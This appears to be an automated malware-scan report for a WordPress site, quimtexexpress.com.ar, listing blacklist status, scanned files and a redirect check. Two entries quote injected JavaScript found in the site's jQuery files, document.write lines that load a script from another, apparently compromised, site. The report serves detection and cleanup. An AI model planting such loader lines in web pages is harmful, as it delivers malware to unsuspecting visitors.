Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=quimtexexpress.com.ar
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://quimtexexpress.com.ar/ | 200 OK Content-Length: 27548 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js | 200 OK Content-Length: 93868 Content-Type: text/javascript | clean |
http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js | 200 OK Content-Length: 9759 Content-Type: text/javascript | clean |
http://quimtexexpress.com.ar/content/themes/quimtex/js/menu.js | 200 OK Content-Length: 764 Content-Type: application/javascript | clean |
http://quimtexexpress.com.ar/content/themes/quimtex/js/slider.js | 200 OK Content-Length: 1557 Content-Type: application/javascript | clean |
http://quimtexexpress.com.ar/content/themes/quimtex/includes/fancybox/lib/jquery.mousewheel-3.0.6.pack.js | 200 OK Content-Length: 1384 Content-Type: application/javascript | clean |
http://quimtexexpress.com.ar/content/themes/quimtex/includes/fancybox/source/jquery.fancybox.pack.js?v=2.1.3 | 200 OK Content-Length: 22643 Content-Type: application/javascript | clean |
http://quimtexexpress.com.ar/content/themes/quimtex/includes/fancybox/source/helpers/jquery.fancybox-buttons.js?v=1.0.5 | 200 OK Content-Length: 3003 Content-Type: application/javascript | clean |
http://quimtexexpress.com.ar/content/themes/quimtex/includes/fancybox/source/helpers/jquery.fancybox-media.js?v=1.0.5 | 200 OK Content-Length: 5169 Content-Type: application/javascript | clean |
http://quimtexexpress.com.ar/content/themes/quimtex/includes/fancybox/source/helpers/jquery.fancybox-thumbs.js?v=1.0.7 | 200 OK Content-Length: 3836 Content-Type: application/javascript | clean |
http://quimtexexpress.com.ar/wp-includes/js/jquery/jquery.js | 200 OK Content-Length: 93244 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://suplementoscenter.com.br/wp-content/HcwZGxXV.php?id=86841460"></script>'); | ||
http://quimtexexpress.com.ar/wp-includes/js/jquery/jquery-migrate.min.js | 200 OK Content-Length: 7359 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://suplementoscenter.com.br/wp-content/HcwZGxXV.php?id=86841454"></script>'); | ||
http://atzpanama.com/ZmpGDkLt.php?id=86841286 | 200 OK Content-Length: 6678 Content-Type: text/html | clean |
http://atzpanama.com/test404page.js | 404 Not Found Content-Length: 282 Content-Type: text/html | clean |
http://atzpanama.com/ZmpGDkLt.php?id=86841287 | 200 OK Content-Length: 6678 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: quimtexexpress.com.ar
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 26 Apr 2014 10:22:05 GMT
Server: Apache
Vary: Cookie
Content-Type: text/html; charset=UTF-8
X-Pingback: http://quimtexexpress.com.ar/xmlrpc.php
X-Powered-By: PHP/5.3.22
GET / HTTP/1.1
Host: quimtexexpress.com.ar
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 26 Apr 2014 10:22:05 GMT
Server: Apache
Vary: Cookie
Content-Type: text/html; charset=UTF-8
X-Pingback: http://quimtexexpress.com.ar/xmlrpc.php
X-Powered-By: PHP/5.3.22
Second query (visit from search engine):
GET / HTTP/1.1
Host: quimtexexpress.com.ar
Referer: http://www.google.com/search?q=quimtexexpress.com.ar
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: quimtexexpress.com.ar
Referer: http://www.google.com/search?q=quimtexexpress.com.ar
Result:
The result is similar to the first query. There are no suspicious redirects found.